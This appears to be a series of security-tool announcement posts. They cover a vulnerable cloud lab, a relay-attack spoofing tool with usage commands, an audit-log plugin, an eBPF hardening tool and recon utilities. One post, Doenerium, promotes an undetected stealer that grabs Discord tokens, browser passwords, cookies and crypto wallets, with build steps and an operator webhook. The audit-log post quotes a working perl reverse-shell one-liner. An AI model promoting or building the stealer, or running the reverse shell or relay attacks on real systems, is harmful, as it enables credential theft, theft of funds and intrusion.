46 Amazon Web Services Object Storage Bucket Object Traversal
47 Amazon Web Services Object Storage Unrestricted File Upload
48 Amazon Web Services Object Storage Bucket Logging Disable
49 Amazon Web Services Object Storage Bucket Allow HTTP Access
50 Amazon Web Services Object Storage Bucket Default Encryption Disable
51 Amazon Web Services Elastic Computing Service EC2 SSRF
52 Amazon Web Services Elastic Computing Service Console Takeover
53 Amazon Web Services Elastic Computing Service EBS Volumes Are Not Used
54 Amazon Web Services Elastic Computing Service EBS Volumes Encryption Is Disabled
55 Amazon Web Services Elastic Computing Service Snapshots Of EBS Volumes Are Unencrypted
56 Amazon Web Services Identity and Access Management IAM Privilege Escalation
57 Google Cloud Platform Object Storage Object ACL Writable
58 Google Cloud Platform Object Storage Bucket ACL Writable
59 Google Cloud Platform Object Storage Bucket Object Traversal
60 Google Cloud Platform Object Storage Unrestricted File Upload
61 Google Cloud Platform Elastic Computing Service VM Command Execution
62 Microsoft Azure Object Storage Blob Public Access
63 Microsoft Azure Object Storage Container Blob Traversal
64 Microsoft Azure Elastic Computing Service VM Command Execution


Install

TerraformGoat is deployed using Docker images and therefore requires Docker Engine; installation instructions for Docker Engine can be found at https://docs.docker.com/engine/install/

Depending on the cloud service provider you are using, choose the corresponding installation command.

Alibaba Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker run -itd --name terraformgoat_aliyun_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker exec -it terraformgoat_aliyun_0.0.4 /bin/bash

Tencent Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_tencentcloud:0.0.4
docker run -itd --name terraformgoat_tencentcloud_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_tencentcloud:0.0.4
docker exec -it terraformgoat_tencentcloud_0.0.4 /bin/bash

Huawei Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_huaweicloud:0.0.4
docker run -itd --name terraformgoat_huaweicloud_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_huaweicloud:0.0.4
docker exec -it terraformgoat_huaweicloud_0.0.4 /bin/bash

Amazon Web Services

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aws:0.0.4
docker run -itd --name terraformgoat_aws_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aws:0.0.4
docker exec -it terraformgoat_aws_0.0.4 /bin/bash

Google Cloud Platform

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_gcp:0.0.4
docker run -itd --name terraformgoat_gcp_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_gcp:0.0.4
docker exec -it terraformgoat_gcp_0.0.4 /bin/bash

Microsoft Azure

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_azure:0.0.4
docker run -itd --name terraformgoat_azure_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_azure:0.0.4
docker exec -it terraformgoat_azure_0.0.4 /bin/bash


Demo

After entering the container, cd to the corresponding scenario directory and you can start deploying the scenario.

Here is a demonstration of the Alibaba Cloud Bucket Object Traversal scenario build.

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker run -itd --name terraformgoat_aliyun_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker exec -it terraformgoat_aliyun_0.0.4 /bin/bash



cd /TerraformGoat/aliyun/oss/bucket_object_traversal/
aliyun configure
terraform init
terraform apply



When the program prompts "Enter a value:", type yes and press Enter. Then use curl to access the bucket, and you can see the objects traversed.



To keep the cloud service from continuing to incur charges, remember to destroy the scenario promptly after using it.

terraform destroy

Uninstall

If you are in a container, first execute the exit command to exit the container, and then execute the following commands on the host.

docker stop $(docker ps -a -q -f "name=terraformgoat*")
docker rm $(docker ps -a -q -f "name=terraformgoat*")
docker rmi $(docker images -a -q -f "reference=registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat*")

Notice

  1. The README of each vulnerable environment is meant to be executed within the TerraformGoat container environment, so the TerraformGoat container environment needs to be deployed first.
  2. Due to the risk of lateral movement on the cloud intranet in some scenarios, it is strongly recommended that users use their own test accounts to configure the scenarios, avoid using the cloud account of the production environment, and install TerraformGoat using the Dockerfile to isolate the user's local cloud vendor token from the test account token.
  3. TerraformGoat is for educational purposes only. It must not be used for illegal or criminal purposes; any consequences arising from TerraformGoat are the responsibility of the person using it, not the selefra organization.


Contributing

Contributions are welcome and greatly appreciated. See CONTRIBUTING.md for details on the contribution workflow.

License

TerraformGoat is under the Apache 2.0 license. See the LICENSE file for details.



Pretender - Your MitM Sidekick For Relaying Attacks Featuring DHCPv6 DNS Takeover As Well As mDNS, LLMNR And NetBIOS-NS Spoofing

27 July 2022 at 12:30
By: Zion3R

Your MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover
as well as mDNS, LLMNR and NetBIOS-NS spoofing


pretender is a tool developed by RedTeam Pentesting to obtain machine-in-the-middle positions via spoofed local name resolution and DHCPv6 DNS takeover attacks. pretender primarily targets Windows hosts, as it is intended to be used for relaying attacks but can be deployed on Linux, Windows and all other platforms Go supports. Name resolution queries can be answered with arbitrary IPs for situations where the relaying tool runs on a different host than pretender. It is designed to work with tools such as Impacket's ntlmrelayx.py and krbrelayx that handle the incoming connections for relaying attacks or hash dumping.

Read our blog post for more information about DHCPv6 DNS takeover, local name resolution spoofing and relay attacks.


Usage

To get a feel for the situation in the local network, pretender can be started in --dry mode where it only logs incoming queries and does not answer any of them:

pretender -i eth0 --dry
pretender -i eth0 --dry --no-ra # without router advertisements

To perform local name resolution spoofing via mDNS, LLMNR and NetBIOS-NS as well as a DHCPv6 DNS takeover with router advertisements, simply run pretender like this:

pretender -i eth0

You can disable certain attacks with --no-dhcp-dns (disables DHCPv6, DNS and router advertisements), --no-lnr (disables mDNS, LLMNR and NetBIOS-NS), --no-mdns, --no-llmnr, --no-netbios and --no-ra.

If ntlmrelayx.py runs on a different host (say 10.0.0.10/fe80::5), run pretender like this:

pretender -i eth0 -4 10.0.0.10 -6 fe80::5

Pretender can be set up to only respond to queries for certain domains (or all but certain domains), and it can perform the spoofing attacks only for certain hosts (or all but certain hosts). Referencing hosts by hostname relies on the name resolution of the host that runs pretender. See the following example:

pretender -i eth0 --spoof example.com --dont-spoof-for 10.0.0.3,host1.corp,fe80::f --ignore-nofqdn

For more information, run pretender --help.


Tips

  • Make sure to enable IPv6 support in ntlmrelayx.py with the -6 flag
  • Pretender can be configured to stop after a certain time period for situations where it cannot be aborted manually (--stop-after and main.vendorStopAfter)
  • Host info lookup (which relies on the ARP table, IP neighbours and reverse lookups) can be disabled with --no-host-info or main.vendorNoHostInfo
  • If you are not sure which interface to choose (especially on Windows), list all interfaces with names and addresses using --interfaces
  • If you want to exclude hosts from local name resolution spoofing, make sure to also exclude their IPv6 addresses or use --no-ipv6-lnr/main.vendorNoIPv6LNR
  • DHCPv6 messages usually contain a FQDN option (which can also sometimes contain a hostname which is not a FQDN). This option is used to filter out messages by hostname (--spoof-for/--dont-spoof-for). You can decide what to do with DHCPv6 messages without FQDN option by setting or omitting --ignore-nofqdn
  • Depending on the build configuration, either the operating system resolver (CGO_ENABLED=1) or a Go implementation (CGO_ENABLED=0) is used. This can be important for host info collection because the OS resolver may support local name resolution and the Go implementation does not, unless a stub resolver is used.
  • The host info functionality is currently only available for Windows and Linux.
  • A custom MAC address vendor list can be compiled into the binary by replacing the default list hostinfo/mac-vendors.txt. Only lines with MAC prefixes in the following format are recognized: FF:FF:FF<tab>VendorID<tab>Vendor (the MAC prefix length can be arbitrary).
  • If you only want to perform Kerberos relaying you can specify --no-lnr and --spoof-types SOA to ignore any queries that are unrelated to the attack (see the example after this list).
  • When conducting a Kerberos relay attack where krbrelayx.py runs on a different host than pretender (relay IPv4 address points to different host that runs krbrelayx.py), the host running krbrelayx.py will also need to run pretender in order to receive and deny the Dynamic Update query sent to the relay IPv4 address.
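
Sketched as a command, the Kerberos-relay-only setup from the tip above might look like this (the interface name is illustrative):

pretender -i eth0 --no-lnr --spoof-types SOA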

Building and Vendoring

Pretender can be built as follows:

go build

Pretender can also be compiled with pre-configured settings. For this, the ldflags have to be modified like this:

-ldflags '-X main.vendorInterface=eth1'

For example, Pretender can be built for Windows with a specific default interface, without colored output and with a relay IPv4 address configured:

GOOS=windows go build -trimpath -ldflags '-X "main.vendorInterface=Ethernet 2" -X main.vendorNoColor=true -X main.vendorRelayIPv4=10.0.0.10'

Full list of vendoring options (see defaults.go or pretender --help for detailed information):

vendorInterface
vendorRelayIPv4
vendorRelayIPv6
vendorSOAHostname
vendorNoDHCPv6DNSTakeover
vendorNoDHCPv6
vendorNoDNS
vendorNoMDNS
vendorNoNetBIOS
vendorNoLLMNR
vendorNoLocalNameResolution
vendorNoRA
vendorNoIPv6LNR
vendorSpoof
vendorDontSpoof
vendorSpoofFor
vendorDontSpoofFor
vendorSpoofTypes
vendorIgnoreDHCPv6NoFQDN
vendorDryMode
vendorTTL
vendorLeaseLifetime
vendorRARouterLifetime
vendorRAPeriod
vendorStopAfter
vendorVerbose
vendorNoColor
vendorNoTimestamps
vendorLogFileName
vendorNoHostInfo
vendorHideIgnored
vendorRedirectStderr
vendorListInterfaces


Laurel - Transform Linux Audit Logs For SIEM Usage

26 July 2022 at 12:30
By: Zion3R


LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.


Why?

TLDR: Instead of audit events that look like this…

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

This happens at the source. The generated event even contains useful information about the spawning process:

"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Description

Logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via PATH and EXECVE elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see Practical auditd(8) problems.

LAUREL solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while keeping all information intact that was part of the original audit log. It does not replace auditd(8) as the consumer of audit messages from the kernel. Instead, it uses the audisp ("audit dispatch") interface to receive messages via auditd(8). Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).

Refer to JSON-based log format for a description of the log format.

We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. Please refer to Performance for details.

A word about audit rules

A good starting point for an audit ruleset is https://github.com/Neo23x0/auditd, but generally speaking, any ruleset will do. LAUREL will currently only work as designed if End Of Event records are not suppressed, so rules like

-a always,exclude -F msgtype=EOE

should be removed.

Events with context

Every event that is caused by a syscall or filesystem rule is annotated with information about the parent of the process that caused the event. If available, id points to the message corresponding to the last execve syscall for this process:

"PARENT_INFO": {
"ID": "1643635026.276:327308",
"comm": "sh",
"exe": "/usr/bin/dash",
"ppid": 1532
}

Adding more context: Keys and process labels

Audit events can contain a key, a short string that can be used to filter events. LAUREL can be configured to recognize such keys and add them as labels to the process that caused the event. These labels can also be propagated to child processes. This is useful to avoid expensive JOIN-like operations in log analysis to filter out harmless events.

Consider the following rule that sets a key for apt-get invocations:

-w /usr/bin/apt-get -p x -k software_mgmt

Let's configure LAUREL to turn the software_mgmt key into a process label that is propagated to child processes:

Together with a ruleset that logs execve(2) and variants, this will cause every event directly caused by apt-get and its subprocesses to be labelled software_mgmt.

For example, running sudo apt-get update on a Debian/bullseye system with a few sources configured, the following subprocesses labelled software_mgmt can be observed in LAUREL's audit log:

  • apt-get update
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/gpgv
  • /usr/lib/apt/methods/gpgv
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/bin/dpkg --print-foreign-architectures

This sort of tracking also works for package installation or removal. If some package's post-installation script is behaving suspiciously, a SIEM analyst will be able to make the connection to the software installation process by inspecting the single event.

Installation

See INSTALL.md.

License

GNU General Public License, version 3

Authors

The logo was created by Birgit Meyer <[email protected]>.



Bpflock - eBPF Driven Security For Locking And Auditing Linux Machines

25 July 2022 at 12:30
By: Zion3R


bpflock - eBPF driven security for locking and auditing Linux machines.

Note: bpflock is currently in an experimental stage; it may break, options and security semantics may change, and some BPF programs will be updated to use the Cilium eBPF library.


1. Introduction

bpflock uses eBPF to strengthen Linux security. By restricting access to a wide range of Linux features, bpflock is able to reduce the attack surface and block some well-known attack techniques.

Only programs like container managers, systemd, and other containers/programs that run in the host PID and network namespaces are allowed access to full Linux features; containers and applications that run in their own namespaces will be restricted. If bpflock's BPF programs run under the restricted profile, then all programs/containers, including privileged ones, will have their access denied.

bpflock protects Linux machines by taking advantage of multiple security features including Linux Security Modules + BPF.

Architecture and Security design notes:

  • bpflock is not a mandatory access control labeling solution, and it does not intend to replace AppArmor, SELinux, and other MAC solutions. bpflock uses a simple declarative security profile.
  • bpflock offers multiple small bpf programs that can be reused in multiple contexts from Cloud Native deployments to Linux IoT devices.
  • bpflock is able to restrict root from accessing certain Linux features, however it does not protect against evil root.

2. Functionality Overview

2.1 Security features

bpflock offers multiple security protections that can be classified as:

2.2 Semantics

bpflock keeps the security semantics simple. It supports three global profiles to broadly cover the security spectrum, and restricts access to specific Linux features.

  • profile: this is the global profile that can be applied per bpf program, it takes one of the following:

    • allow|none|privileged : they are the same, they define the least secure profile. In this profile access is logged and allowed for all processes. Useful to log security events.
    • baseline : restrictive profile where access is denied for all processes, except privileged applications and containers that run in the host namespaces, or per cgroup allowed profiles in the bpflock_cgroupmap bpf map.
    • restricted : heavily restricted profile where access is denied for all processes.
  • Allowed or blocked operations/commands:

    Under the allow|privileged or baseline profiles, a list of allowed or blocked commands can be specified and will be applied.

    • --protection-allow : comma-separated list of allowed operations. Valid under baseline profile, this is useful for applications that are too specific and perform privileged operations. It will reduce the use of the allow | privileged profile, so instead of using the privileged profile, we can specify the baseline one and add a set of allowed commands to offer a case-by-case definition for such applications.
    • --protection-block : comma-separated list of blocked operations. Valid under allow|privileged and baseline profiles, it allows to restrict access to some features without using the full restricted profile that might break some specific applications. Using baseline or privileged profiles opens the gate to access most Linux features, but with the --protection-block option some of this access can be blocked.

For bpf security examples check bpflock configuration examples

3. Deployment

3.1 Prerequisites

bpflock needs the following:

  • Linux kernel version >= 5.13 with the following configuration:

    Obviously a BTF enabled kernel.

    Enable BPF LSM support

Check your /boot/config-* file to confirm that the kernel was compiled with CONFIG_BPF_LSM=y; if it was not, running bpflock fails with:

    must have a kernel with 'CONFIG_BPF_LSM=y' 'CONFIG_LSM=\"...,bpf\"'"

    Then to enable BPF LSM as an example on Ubuntu:

    1. Open the /etc/default/grub file with root privileges.
    2. Append the following to the GRUB_CMDLINE_LINUX variable and save.
      "lsm=lockdown,capability,yama,apparmor,bpf"
      or
      GRUB_CMDLINE_LINUX="lsm=lockdown,capability,yama,apparmor,bpf"
    3. Update grub config with:
      sudo update-grub2
    4. Reboot into your kernel.
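
    After rebooting, you can confirm that the bpf LSM is active (securityfs is normally mounted at /sys/kernel/security):

    cat /sys/kernel/security/lsm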

    3.2 Docker deployment

    To run using the default allow or privileged profile (the least secure profile):

    docker run --name bpflock -it --rm --cgroupns=host \
    --pid=host --privileged \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Fileless Binary Execution

    To log and restrict fileless binary execution, run with:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_FILELESSLOCK_PROFILE=restricted" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    When running under the restricted profile, the container logs will display:

    Running under the restricted profile may break things; this is why the default profile is allow.

    Kernel Modules Protection

    To apply Kernel Modules Protection run with environment variable BPFLOCK_KMODLOCK_PROFILE=baseline or BPFLOCK_KMODLOCK_PROFILE=restricted:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_KMODLOCK_PROFILE=restricted" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example:

    $ sudo unshare -p -n -f
    # modprobe xfs
    modprobe: ERROR: could not insert 'xfs': Operation not permitted
    Kernel Image Lock-down

    To apply Kernel Image Lock-down run with environment variable BPFLOCK_KIMGLOCK_PROFILE=baseline:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_KIMGLOCK_PROFILE=baseline" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock
    $ sudo unshare -f -p -n bash
    # head -c 1 /dev/mem
    head: cannot open '/dev/mem' for reading: Operation not permitted
    BPF Protection

    To apply bpf restriction run with environment variable BPFLOCK_BPFRESTRICT_PROFILE=baseline or BPFLOCK_BPFRESTRICT_PROFILE=restricted:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_BPFRESTRICT_PROFILE=baseline" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example running in different pid and network namespaces, using bpftool:

    $ sudo unshare -f -p -n bash
    # bpftool prog
    Error: can't get next program: Operation not permitted
    Running with the -e "BPFLOCK_BPFRESTRICT_PROFILE=restricted" profile will deny bpf for all processes.
    3.3 Configuration and Environment file

    Passing configuration as bind mounts can be achieved using the following command.

    Assuming bpflock.yaml and the bpf.d profile configs are in a bpflock directory under the current directory, we can just use:

    ls bpflock/
    bpf.d bpflock.d bpflock.yaml
    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -v $(pwd)/bpflock/:/etc/bpflock \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Passing environment variables can also be done with files using --env-file. All parameters can be passed as environment variables using the BPFLOCK_$VARIABLE_NAME=VALUE format.

    Example run with environment variables in a file:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    --env-file bpflock.env.list \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock
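
    For reference, bpflock.env.list is a plain VAR=VALUE file; an illustrative example using profile variables already shown in this README (enable only the programs you need):

    BPFLOCK_FILELESSLOCK_PROFILE=restricted
    BPFLOCK_KMODLOCK_PROFILE=baseline
    BPFLOCK_BPFRESTRICT_PROFILE=baseline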

    4. Documentation

    Documentation files can be found here.

    5. Build

    bpflock uses docker BuildKit to build, and Golang to run some checks and tests. bpflock is built inside an Ubuntu container that downloads the standard golang package.

    Run the following to build the bpflock docker container:

    git submodule update --init --recursive
    make

    The bpf programs are built using libbpf; the docker image used is Ubuntu.

    If you want to only build the bpf programs directly without using docker, then on Ubuntu:

    sudo apt install -y pkg-config bison binutils-dev build-essential \
    flex libc6-dev clang-12 libllvm12 llvm-12-dev libclang-12-dev \
    zlib1g-dev libelf-dev libfl-dev gcc-multilib \
    libcap-dev libiberty-dev libbfd-dev

    Then run:

    make bpf-programs

    In this case the generated programs will be inside the ./bpf/build/... directory.

    Credits

    bpflock draws on a lot of resources, including source code from the Cilium and bcc projects.

    License

    The bpflock user space components are licensed under the Apache License, Version 2.0. The BPF code where it is noted is licensed under the General Public License, Version 2.0.



Doenerium - Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)

24 July 2022 at 12:30
By: Zion3R

Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)

Features

Stealer

  • Discord Token
  • Discord Info - Username, Phone number, Email, Billing, Nitro Status & Backup Codes
  • Discord Friends with rare badges
  • Grabs crypto wallets
    • Zcash
    • Armory
    • Bytecoin
    • Jaxx
    • Exodus
    • Ethereum
    • Electrum
    • AtomicWallet
    • Guarda
    • Coinomi
  • Browser (Chrome, Opera, Firefox, OperaGX, Edge, Brave, Yandex) - Passwords, Cookies, Autofill & History (Searches for specific keywords such as PayPal, Coinbase etc. in them)
  • Screenshot(s)
  • Injects itself into Discord to grab the token whenever it changes


Additional

  • Crypto Clipper - BTC, LTC, XMR, ETH, XRP, NEO, BCH, DOGE, DASH, XLM
  • Ultra Obfuscation (use https://obfuscator.io)
  • Anti-Debug
  • Anti-VM
  • Validates a found discord token and then sends it to your discord webhook
  • Sends all files to your discord webhook in beautiful embeds and a structured zip file


Screenshots

Setting Up

Install Node.js

Install Visual Studio with the C++ compilers and all components enabled (it is a few gigabytes, but you won't have build errors)

Run the install.bat file to install all necessary files

Replace WEBHOOK with your webhook in config.js

Run build.bat and wait for doenerium-win.exe to be built.

Todo

  • Exodus wallet injection (get the password whenever the user logs in the wallet)
  • More grabbers (VPNs, gaming, messengers)
  • Keylogger
  • Growtopia stealer
  • Discord bot to build within discord ($build <webhook_url>)
  • Dynamic encryption

License

By downloading this, you agree to the Commons Clause license and that you're not allowed to sell this repository or any code from this repository. For more info see commonsclause

Note

There is no official telegram server of this project. I don't own t.me/doenerium

I am not responsible for any damages this software may cause. This was made for personal education.

Credits

Credits to Pandoric / PandoricGalaxy for creating this beautiful README file



modDetective - Tool That Chronologizes Files Based On Modification Time In Order To Investigate Recent System Activity

23 July 2022 at 12:30
By: Zion3R


modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in CTFs in order to pinpoint where escalation and attack vectors may exist.


To see the tool in its most useful form, try running the command as follows: python3 modDetective.py -i /usr/share,/usr/lib,/lib. This will ignore the /usr/lib, /usr/share, and /lib directories, which tend not to have anything of interest. Also note that by default the "dynamic" directories are ignored (/proc, /sys, /run, /snap, /dev).

What is modDetective Doing?

modDetective is very elementary in how it operates. It simply walks the filesystem, with bounds determined by user-specified options (-i is for ignore, meaning the tool will walk every directory EXCEPT the ones specified in the -i option, and -e is for exclusive, meaning the tool will ONLY walk the directories specified). While walking, it picks up the modification times of each file, then orders them to produce a chronological output.
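
For example, to walk only a few directories of interest (an illustrative run using the -e flag described above):

python3 modDetective.py -e /home,/etc,/var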

Additionally, the output will potentially show some files highlighted in red. These are denoted "Indicators of User Activity," since recent modifications to these files indicate that a user is currently active. As of now, these files include .swp files, .bash_history, .python_history and .viminfo. This list will be extended as I brainstorm more files that indicate present user activity.

Requirements

modDetective currently works only with python3; python2 compatibility will be completed shortly (hence the lack of f-strings). Standard libraries should be fine.



LiveTargetsFinder - Generates Lists Of Live Hosts And URLs For Targeting, Automating The Usage Of MassDNS, Masscan And Nmap To Filter Out Unreachable Hosts And Gather Service Information

22 July 2022 at 12:30
By: Zion3R


Generates lists of live hosts and URLs for targeting, automating the usage of MassDNS, Masscan and nmap to filter out unreachable hosts

Given an input file of domain names, this script will automate the usage of MassDNS to filter out unresolvable hosts, and then pass the results on to Masscan to confirm that the hosts are reachable and on which ports. The script will then generate a list of full URLs to be used for further targeting (passing into tools like gobuster or dirsearch, or making HTTP requests), a list of reachable domain names, and a list of reachable IP addresses. As an optional last step, you can run an nmap version scan on this reduced host list, verifying that the earlier reachable hosts are up, and gathering service information from their open ports.


Overview

This script is especially useful for large domain sets, such as subdomain enumerations gathered from an apex domain with thousands of subdomains. With these large lists, an nmap scan would simply take too long. The goal here is to first use the less accurate, but much faster, MassDNS to quickly reduce the size of your input list by removing unresolvable domains. Then, Masscan will be able to take the output from MassDNS, and further confirm that the hosts are reachable, and on which ports. The script will then parse these results and generate lists of the live hosts discovered.

Now, the list of hosts should be reduced enough to be suitable for further scanning/testing. If you want to go a step further, you can tell the script to run an nmap scan on the list of reachable hosts, which should take a more reasonable amount of time with the shorter list of hosts. After running nmap, any false positives given from Masscan will be filtered out. Raw nmap output will be stored in the regular nmap XML format, and additional information from the version detection will be added to a SQLite database.

Installation

If using the nmap scan option, this tool assumes that you already have nmap installed

Note: Running the install script is only needed if you do not already have MassDNS and Masscan installed, or if you would like to reinstall them inside this repo. If you do not run the script, you can provide the paths to the respective executables as arguments. The script additionally expects that the resolvers list included with MassDNS be located at {massDNS_directory}/lists/resolvers.txt.

git clone https://github.com/allyomalley/LiveTargetsFinder.git
cd LiveTargetsFinder
sudo pip3 install -r requirements.txt

(OPTIONAL)

chmod +x install_deps.sh
./install_deps.sh

If you do not already have MassDNS and Masscan installed, and would prefer to install them yourself, see the documentation for instructions:

MassDNS

Masscan

I have only tested this script on macOS and Linux - the python script itself should work on a Windows machine, though I believe the installation for MassDNS and Masscan will differ.

Usage

python3 liveTargetsFinder.py [domainList] [options]
Flag             Description                                                                           Default                            Required
--target-list    Input file containing a list of domains, e.g. google.com                                                                Yes
--massdns-path   Path to the MassDNS executable, if non-default                                        ./massdns/bin/massdns              No
--masscan-path   Path to the Masscan executable, if non-default                                        ./masscan/bin/masscan              No
--nmap           Run an nmap version detection scan on the gathered live hosts                         Disabled                           No
--db-path        Path to the database to append to when using --nmap (created if it does not exist)    output/liveTargetsFinder.sqlite3   No
  • Note that the Masscan and MassDNS settings are hardcoded inside liveTargetsFinder.py. Feel free to edit them (lines 87 + 97).
  • Since this tool was designed with very large lists in mind, I tweaked many of the settings to try to balance speed, accuracy, and network constraints - these can all be adjusted to suit your needs and bandwidth.
  • The default settings for Masscan only scan ports 80 and 443.
    • -s, (--hashmap-size) in particular was chosen for performance reasons - you will likely be able to increase this.
    • Full MassDNS arguments:
      • -c 25 -o J -r ./massdns/lists/resolvers.txt -s 100 -w massdnsOutput -t A targetHosts
      • Documentation
  • Another setting of note is the --max-rate argument for Masscan - you will likely want to adjust this.
    • Full Masscan arguments:
      • -iL ipFile -oD masscanOutput --open-only --max-rate 5000 -p80,443 --max-retries 10
      • Documentation
  • The default nmap settings only scan ports 80 and 443, with timing -T4 and a few NSE scripts.
    • Full nmap arguments:
      • --script http-server-header.nse,http-devframework.nse,http-headers -sV -T4 -p80,443 -oX {output.xml}

Example

Did run install script:

python3 liveTargetsFinder.py --target-list victim_domains.txt

Did NOT run the install script:

python3 liveTargetsFinder.py --target-list victim_domains.txt --massdns-path ../massdns/bin/massdns --masscan-path ../masscan/bin/masscan 

Perform an nmap scan and write to/append to the default DB path (liveTargetsFinder.sqlite3)

python3 liveTargetsFinder.py --target-list victim_domains.txt --nmap

Perform an nmap scan and write to/append to the specified database

python3 liveTargetsFinder.py --target-list victim_domains.txt --nmap --db-path serviceinfo_victim.sqlite3

Output

Input: victimDomains.txt

File                                     Description                                                                        Examples
output/victimDomains_targetUrls.txt      List of reachable, live URLs                                                       https://github.com, http://github.com
output/victimDomains_domains_alive.txt   List of live domain names                                                          github.com, google.com
output/victimDomains_ips_alive.txt       List of live IP addresses                                                          10.1.0.200, 52.3.1.166
Supplied or default DB path              SQLite database storing live hosts and information about their running services
output/victimDomains_massdns.txt         The raw output from MassDNS, in ndjson format
output/victimDomains_masscan.txt         The raw output from Masscan, in ndjson format
output/victimDomains_nmap.txt            The raw output from nmap, in XML format
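
To inspect the SQLite results without guessing at the schema, the sqlite3 shell's built-in commands are enough (the table layout is not documented here, so list it first):

sqlite3 output/liveTargetsFinder.sqlite3 ".tables"
sqlite3 output/liveTargetsFinder.sqlite3 ".schema"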


RESim - Reverse Engineering Software Using A Full System Simulator

21 July 2022 at 12:30
By: Zion3R


Reverse engineering using a full system simulator.

  • Dynamic analysis by instrumenting simulated hardware using Simics
  • Trace process trees, system calls and individual programs
  • Reverse execution to selected breakpoints and events
  • Integrated with IDA Pro(tm) debugging client
  • Fuzz with a customized AFL, injecting directly into simulated memory

RESim is a dynamic system analysis tool that provides detailed insight into processes, programs and data flow within networked computers. RESim simulates networks of computers through use of the Simics[1] platform's high-fidelity models of processors, peripheral devices (e.g., network interface cards), and disks. The networked simulated computers load and run targeted software copied from images extracted from the physical systems being modeled.

Broadly, RESim aids reverse engineering and vulnerability analysis of networks of Linux-based systems by inventorying processes in terms of the programs they execute and the data they consume. Data sources include files, device interfaces and inter-process communication mechanisms. Process execution and data consumption is documented through dynamic analysis of a running simulated system without installation or injection of software into the simulated system, and without detailed knowledge of the kernel hosting the processes.

RESim also provides interactive visibility into individual executing programs through use of a custom plug-in to the IDA Pro disassembler/debugger. The disassembler/debugger allows setting breakpoints to pause the simulation at selected events in either future time, or past time. For example, RESim can direct the simulation state to reverse until the most recent modification of a selected memory address.
Reloadable checkpoints may be generated at any point during system execution.
A RESim simulation can be paused for inspection, e.g., when a specified process is scheduled for execution, and subsequently continued, potentially with altered memory or register state. The analyst can explicitly modify memory or register content, and can also dynamically augment memory based on system events, e.g., change a password file entry when read by the su program.

Analysis is performed entirely through observation of the simulated target system’s memory and processor state, without need for shells, software injection, or kernel symbol tables. The analysis is said to be external because the analysis observation functions have no effect on the state of the simulated system.

